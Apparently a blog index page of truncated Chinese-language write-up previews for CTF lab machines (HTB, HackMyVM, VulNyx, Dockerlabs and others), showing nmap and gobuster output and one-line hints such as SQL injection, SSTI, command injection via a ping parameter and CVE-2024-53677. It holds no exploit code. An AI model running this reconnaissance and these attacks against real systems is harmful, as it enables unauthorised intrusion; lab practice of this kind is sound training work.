/server-status        (Status: 403) [Size: 279]
Progress: 661680 / 661683 (100.00%)
===============================================================

查看**/note.txt**

Dockerlabs-stackinferno

Thu, 17 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

提权部分为非预期

Nmap

[root@kali] /home/kali/stackinferno  
❯ nmap 172.17.0.2 -sV -A -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 88:00:5f:26:eb:50:e4:55:6d:0a:0c:73:58:99:cd:2d (ECDSA)
|_  256 6b:36:5c:a3:c0:8b:22:b7:35:11:86:f1:7e:7f:77:5b (ED25519)
80/tcp open  http    Werkzeug/2.2.2 Python/3.11.2
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 302 FOUND
|     Server: Werkzeug/2.2.2 Python/3.11.2
|     Date: Wed, 16 Apr 2025 03:01:23 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 223
|     Location: http://cybersec.dl
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to the target URL: <a href="http://cybersec.dl">http://cybersec.dl</a>. If not, click the link.
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 302 FOUND
|     Server: Werkzeug/2.2.2 Python/3.11.2
|     Date: Wed, 16 Apr 2025 03:01:18 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 223
|     Location: http://cybersec.dl
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to the target URL: <a href="http://cybersec.dl">http://cybersec.dl</a>. If not, click the link.
|   RTSPRequest: 
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
|_http-title: CyberSec Corp - Expertos en Ciberseguridad

添加域名：cybersec.dl

HackMyVM-buster

Thu, 17 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.151 -sV -A                                                                                                                              

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
|   256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_  256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open  http    nginx 1.14.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: nginx/1.14.2
|_http-generator: WordPress 6.7.1
|_http-title: bammmmuwe

直接就扫到了wordpress目录

Dockerlabs-ChocoPing

Tue, 15 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Chocoping  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.62
|_http-title: Index of /
|_http-server-header: Apache/2.4.62 (Debian)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 1.0K  2025-04-05 11:13  ping.php

Own www-data

注意到可以传入ip参数执行ping命令

下面我会用两种扫描工具来进行对比

HTB-Nocturnal

Mon, 14 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/Nocturnal  
❯ nmap Nocturnal.htb -sV -A      

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Welcome to Nocturnal
|_http-server-header: nginx/1.18.0 (Ubuntu)

User

任意注册一个账户，然后登录，可以上传一些文件

HackMyVM-jan

Wed, 09 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.144  -p-

PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Gobuster

[root@kali] /home/kali  
❯ gobuster dir -u http://192.168.56.144:8080/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt --exclude-length 45
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.144:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          45
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/redirect             (Status: 400) [Size: 24]
/robots.txt           (Status: 200) [Size: 16]
Progress: 97322 / 882244 (11.03%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 100724 / 882244 (11.42%)
===============================================================
Finished
===============================================================

发现一个**/redirect路由，并且需要url**参数

Dockerlabs-WalkingDead

Tue, 08 Apr 2025 00:00:00 +0000

《The Walking Dead》又叫做《行尸走肉》，是一部更了十多年的美剧，我是全部看完了的，刚好有这个靶机，那么肯定得打一下。

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0d:09:9d:0f:dc:43:54:cd:39:a9:e2:d6:81:74:40:e8 (RSA)
|   256 09:d0:f6:52:00:3f:21:51:19:b1:c6:7a:f4:ff:21:01 (ECDSA)
|_  256 19:e0:b3:72:bd:e9:1e:8d:4c:c4:fd:1f:da:3f:a5:cf (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Walking Dead - CTF

访问网页，发现有一个隐藏的shell.php

Thehackerslabs-Black Gold

Tue, 08 Apr 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Hard

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.10 -sV -A -p-

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title:  Neptune 
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-08 07:26:35Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: neptune.thl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: neptune.thl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
53459/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
53460/tcp open  msrpc         Microsoft Windows RPC
53470/tcp open  msrpc         Microsoft Windows RPC
53479/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:37:4E:C0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-08T07:27:27
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:37:4e:c0 (Oracle VirtualBox virtual NIC)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

修改**/etc/hosts**

VulNyx-Matrix

Tue, 08 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Matrix  
❯ nmap 192.168.56.141 -sV -A -p-

22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey: 
|   256 67:78:c9:d2:e3:ff:be:fc:9e:13:9a:af:9d:59:17:66 (ECDSA)
|_  256 1a:78:b1:e6:f1:f0:d1:b3:ab:c8:3f:95:fd:46:52:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Enter The Matrix

Gobuster

[root@kali] /home/kali/Matrix  
❯ gobuster dir -u http://192.168.56.141/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt   -x .pcap 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.141/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              pcap
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/trinity.pcap         (Status: 200) [Size: 146389]
/server-status        (Status: 403) [Size: 279]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================

Exiftool

进行流量分析

Thehackerslabs-B.I.G

Sat, 05 Apr 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Hard

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.212.4 -sV -A -p-

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-05 23:20:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
57043/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:29:23:16 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: Host: BIG; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 15h54m38s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_nbstat: NetBIOS name: BIG, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:29:23:16 (Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2025-04-05T23:21:49
|_  start_date: 2025-04-05T19:55:29

将bbr.thl添加到**/etc/hosts**

HackMyVM-Todd

Wed, 02 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/Todd  
❯ nmap 192.168.56.137 -sV -A  -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)
|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)
|_  256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Mindful Listening
|_http-server-header: Apache/2.4.59 (Debian)

页面没有任何可以用的信息

然后再次进行Nmap，发现多了几个端口

VulnVM-Search

Wed, 02 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/Search  
❯ nmap 192.168.56.136 -sV -A  -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 39:0d:70:e0:55:cb:20:de:ad:f7:10:d8:1f:76:4d:9d (ECDSA)
|_  256 df:e2:94:52:e9:3d:eb:69:2d:b4:a5:a9:2c:3e:63:46 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Apache2 Debian Default Page: It works

得到用户名是support

HTB-Haze

Mon, 31 Mar 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Hard

Nmap

[root@kali] /home/kali  
❯ nmap Haze.htb -sV -A                      

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
8000/tcp open  http          Splunkd httpd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://Haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry 
|_/
8088/tcp open  ssl/http      Splunkd httpd
|_http-server-header: Splunkd
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry 
|_/
8089/tcp open  ssl/http      Splunkd httpd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd

dc01.haze.htb添加到**/etc/hosts**

HackMyVM-KrustyKrab

Thu, 27 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.131 -sV -A  -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 f6:91:6b:ad:ea:ad:1d:b9:44:09:d8:74:a3:02:38:35 (ECDSA)
|_  256 b6:66:2f:f0:4c:26:7f:7d:14:ea:b3:62:09:64:a7:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)

进入80端口查看，是一个apache默认页

HTB-Code

Sun, 23 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/Code  
❯ nmap code.htb -sV -A                 

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
|   256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_  256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open  http    Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4

Own www-data

SSTI 注入 - Hello CTF

进入到5000端口是一个python代码执行窗口

HTB-Strutted

Sat, 22 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Strutted  
❯ nmap strutted.htb -sV    

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)

CVE-2024-53677

存在一个Download路由可以下载到网站源码

查看pom.xml发现使用的是struts2 6.3.0.1

VulnVM-Interceptor

Fri, 21 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap

[root@kali] /home/kali/Interceptor  
❯ nmap 192.168.56.123 -sV -A  -p- 

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)

Gobuster

[root@kali] /home/kali/Interceptor  
❯ gobuster dir -u http://192.168.56.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,html,txt        
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.123
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.123/wordpress/]
/backup               (Status: 301) [Size: 317] [--> http://192.168.56.123/backup/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/fping.php            (Status: 200) [Size: 1958]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

Crack ZIP

在**/backup里发现一个压缩包，应该是涉及到了/fping**这个路由的。

HTB-TheFrizz

Mon, 17 Mar 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Medium

Nmap

[root@kali] /home/kali/TheFrizz  
❯ nmap thefrizz.htb -sV -A                                                                                                                                

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

将frizz.htb添加到**/etc/hosts**

VulNyx-Loweb

Mon, 17 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Low

Nmap

[root@kali] /home/kali/Loweb  
❯ nmap 192.168.56.122 -sV -A  -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 65:bb:ae:ef:71:d4:b5:c5:8f:e7:ee:dc:0b:27:46:c2 (ECDSA)
|_  256 ea:c8:da:c8:92:71:d8:8e:08:47:c0:66:e0:57:46:49 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)

Gobuster

[root@kali] /home/kali/Loweb  
❯ gobuster dir -u http://192.168.56.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt             
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.122
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/library              (Status: 301) [Size: 318] [--> http://192.168.56.122/library/]
/server-status        (Status: 403) [Size: 279]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

[root@kali] /home/kali/Loweb  
❯ gobuster dir -u http://192.168.56.122/library -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,html,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.122/library
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1068]
/login                (Status: 301) [Size: 324] [--> http://192.168.56.122/library/login/]
/admin                (Status: 301) [Size: 324] [--> http://192.168.56.122/library/admin/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

SQL Injection

进入登录页面，用户名处存在SQL注入

VulNyx-Zerotrace

Sun, 16 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.119 -sV -A              

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http    nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Massively by HTML5 UP
8000/tcp open  ftp     pyftpdlib 1.5.7
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.119:8000
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.

Dirsearch

[root@kali] /home/kali/Zerotrace  
❯ dirsearch -u http://192.168.56.119 -t 50    
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                         
                                                                                                                                                                                                                
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460

Output File: /home/kali/Zerotrace/reports/http_192.168.56.119/_25-03-15_19-12-30.txt

Target: http://192.168.56.119/

[19:12:30] Starting:                                                                                                                                                                                            
[19:12:30] 301 - 169B  - /.admin  ->  http://192.168.56.119/.admin/        
[19:12:30] 403 - 555B  - /.admin/
[19:12:31] 403 - 555B  - /.ht_wsr.txt                                      
[19:12:31] 403 - 555B  - /.htaccess.bak1                                   
[19:12:31] 403 - 555B  - /.htaccess.orig                                   
[19:12:31] 403 - 555B  - /.htaccess.sample
[19:12:31] 403 - 555B  - /.htaccess.save
[19:12:31] 403 - 555B  - /.htaccess_extra                                  
[19:12:31] 403 - 555B  - /.htaccess_orig
[19:12:31] 403 - 555B  - /.htaccess_sc
[19:12:31] 403 - 555B  - /.htaccessOLD
[19:12:31] 403 - 555B  - /.htaccessBAK
[19:12:31] 403 - 555B  - /.htaccessOLD2                                    
[19:12:31] 403 - 555B  - /.htm
[19:12:31] 403 - 555B  - /.html                                            
[19:12:31] 403 - 555B  - /.httr-oauth                                      
[19:12:31] 403 - 555B  - /.htpasswds                                       
[19:12:31] 403 - 555B  - /.htpasswd_test                                   
[19:12:37] 301 - 169B  - /assets  ->  http://192.168.56.119/assets/        
[19:12:37] 403 - 555B  - /assets/                                          
[19:12:43] 403 - 555B  - /images/                                          
[19:12:43] 301 - 169B  - /images  ->  http://192.168.56.119/images/
[19:12:44] 200 - 17KB - /LICENSE.txt                                      
[19:12:50] 200 - 930B  - /README.txt                                       
[19:12:54] 403 - 555B  - /uploads/                                         
[19:12:54] 403 - 555B  - /uploads/affwp-debug.log                          
[19:12:54] 403 - 555B  - /uploads/dump.sql                                 
                                                                             
Task Completed

发现存在一个**/.admin**目录

VulNyx-Lower4

Sat, 15 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Low

Nmap

[root@kali] /home/kali/Lower4  
❯ nmap 192.168.56.120 -sV -A                                                

PORT    STATE SERVICE VERSION                                                                                                                                                              
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
